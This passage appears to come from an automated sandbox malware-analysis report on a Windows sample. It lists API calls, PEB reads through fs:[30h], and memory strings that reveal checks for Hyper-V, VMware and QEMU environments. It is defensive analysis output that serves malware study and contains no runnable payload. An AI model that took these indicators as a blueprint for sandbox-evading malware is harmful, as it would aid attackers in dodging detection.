      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C49
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_00406873 FindFirstFileW,FindClose,2_2_00406873
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeAPI call chain: ExitProcess graph end nodegraph_2-7719
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeAPI call chain: ExitProcess graph end nodegraph_2-7875
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: vm3dc003.dll.2.drBinary or memory string: http://www.vmware.com/0
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.1!0
      Source: vm3dc003.dll.2.drBinary or memory string: %s: VMToolsRegistry Not set.
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: vm3dc003.dll.2.drBinary or memory string: http://www.vmware.com/0/
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205927120983.000000000199C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649789523.000000000199C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649475257.0000000001964000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205925848448.000000000199C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.1
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.0
      Source: vm3dc003.dll.2.drBinary or memory string: ProductNameVMware SVGA 3D`
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: vm3dc003.dll.2.drBinary or memory string: LegalCopyrightCopyright (C) 1998-2021 VMware, Inc.B
      Source: vm3dc003.dll.2.drBinary or memory string: {4d36e968-e325-11ce-bfc1-08002be10318}SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}CoInstallers32SOFTWARE\Microsoft\Windows\CurrentVersion\RunVMware VM3DService ProcessRegDeleteValue failed (0x%lx).
      Source: vm3dc003.dll.2.drBinary or memory string: noreply@vmware.com0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: vm3dc003.dll.2.drBinary or memory string: dbghelp.dllSoftware\VMware, Inc.\VMware SVGADebugSearchPathBacktrace[%2d] rip=%p %s+%#x %s:%d
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: vm3dc003.dll.2.drBinary or memory string: FileDescriptionVMware SVGA 3D Coinstaller:
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: vm3dc003.dll.2.drBinary or memory string: Software\VMware, Inc.\VMware SVGA
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: vm3dc003.dll.2.drBinary or memory string: CompanyNameVMware, Inc.^
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_713C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_713C1BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AA8BEA rdtsc 2_2_02AA8BEA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB98FA mov eax, dword ptr fs:[00000030h]2_2_02AB98FA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB904B mov eax, dword ptr fs:[00000030h]2_2_02AB904B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02ABAF38 mov eax, dword ptr fs:[00000030h]2_2_02ABAF38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E5D60 mov eax, dword ptr fs:[00000030h]4_2_1D7E5D60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4DA7 mov eax, dword ptr fs:[00000030h]4_2_1D8A4DA7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D1D50 mov eax, dword ptr fs:[00000030h]4_2_1D7D1D50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D1D50 mov eax, dword ptr fs:[00000030h]4_2_1D7D1D50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDD4D mov eax, dword ptr fs:[00000030h]4_2_1D7EDD4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDD4D mov eax, dword ptr fs:[00000030h]4_2_1D7EDD4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDD4D mov eax, dword ptr fs:[00000030h]4_2_1D7EDD4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C9D46 mov eax, dword ptr fs:[00000030h]4_2_1D7C9D46
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C9D46 mov eax, dword ptr fs:[00000030h]4_2_1D7C9D46
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C9D46 mov ecx, dword ptr fs:[00000030h]4_2_1D7C9D46
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802DBC mov eax, dword ptr fs:[00000030h]4_2_1D802DBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802DBC mov ecx, dword ptr fs:[00000030h]4_2_1D802DBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CFD20 mov eax, dword ptr fs:[00000030h]4_2_1D7CFD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88ADD6 mov eax, dword ptr fs:[00000030h]4_2_1D88ADD6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88ADD6 mov eax, dword ptr fs:[00000030h]4_2_1D88ADD6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov ecx, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAD20 mov eax, dword ptr fs:[00000030h]4_2_1D7FAD20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89CDEB mov eax, dword ptr fs:[00000030h]4_2_1D89CDEB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89CDEB mov eax, dword ptr fs:[00000030h]4_2_1D89CDEB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FCD10 mov eax, dword ptr fs:[00000030h]4_2_1D7FCD10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FCD10 mov ecx, dword ptr fs:[00000030h]4_2_1D7FCD10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF4 mov eax, dword ptr fs:[00000030h]4_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]4_2_1D7DAD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]4_2_1D7DAD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]4_2_1D7DAD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]4_2_1D7DAD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]4_2_1D7DAD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DAD00 mov eax, dword ptr fs:[00000030h]4_2_1D7DAD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F0D01 mov eax, dword ptr fs:[00000030h]4_2_1D7F0D01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88BD08 mov eax, dword ptr fs:[00000030h]4_2_1D88BD08
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88BD08 mov eax, dword ptr fs:[00000030h]4_2_1D88BD08
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CEDFA mov eax, dword ptr fs:[00000030h]4_2_1D7CEDFA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D868D0A mov eax, dword ptr fs:[00000030h]4_2_1D868D0A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DBDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7DBDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FFDE0 mov eax, dword ptr fs:[00000030h]4_2_1D7FFDE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880D24 mov eax, dword ptr fs:[00000030h]4_2_1D880D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880D24 mov eax, dword ptr fs:[00000030h]4_2_1D880D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880D24 mov eax, dword ptr fs:[00000030h]4_2_1D880D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880D24 mov eax, dword ptr fs:[00000030h]4_2_1D880D24
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C8DCD mov eax, dword ptr fs:[00000030h]4_2_1D7C8DCD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4D4B mov eax, dword ptr fs:[00000030h]4_2_1D8A4D4B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D895D43 mov eax, dword ptr fs:[00000030h]4_2_1D895D43
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D895D43 mov eax, dword ptr fs:[00000030h]4_2_1D895D43
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D7DB6 mov eax, dword ptr fs:[00000030h]4_2_1D7D7DB6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CDDB0 mov eax, dword ptr fs:[00000030h]4_2_1D7CDDB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C6DA6 mov eax, dword ptr fs:[00000030h]4_2_1D7C6DA6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851D5E mov eax, dword ptr fs:[00000030h]4_2_1D851D5E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6D91 mov eax, dword ptr fs:[00000030h]4_2_1D7D6D91
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A5D65 mov eax, dword ptr fs:[00000030h]4_2_1D8A5D65
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BD71 mov eax, dword ptr fs:[00000030h]4_2_1D80BD71
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BD71 mov eax, dword ptr fs:[00000030h]4_2_1D80BD71
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCD8A mov eax, dword ptr fs:[00000030h]4_2_1D7CCD8A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCD8A mov eax, dword ptr fs:[00000030h]4_2_1D7CCD8A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D0C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D0C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D0C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D0C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D0C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D0C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D8C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D8C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D8C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D8C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D8C79 mov eax, dword ptr fs:[00000030h]4_2_1D7D8C79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCC68 mov eax, dword ptr fs:[00000030h]4_2_1D7CCC68
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88FC95 mov eax, dword ptr fs:[00000030h]4_2_1D88FC95
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov ecx, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C60 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D879C98 mov ecx, dword ptr fs:[00000030h]4_2_1D879C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D879C98 mov eax, dword ptr fs:[00000030h]4_2_1D879C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D879C98 mov eax, dword ptr fs:[00000030h]4_2_1D879C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D879C98 mov eax, dword ptr fs:[00000030h]4_2_1D879C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CDC40 mov eax, dword ptr fs:[00000030h]4_2_1D7CDC40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C40 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C40
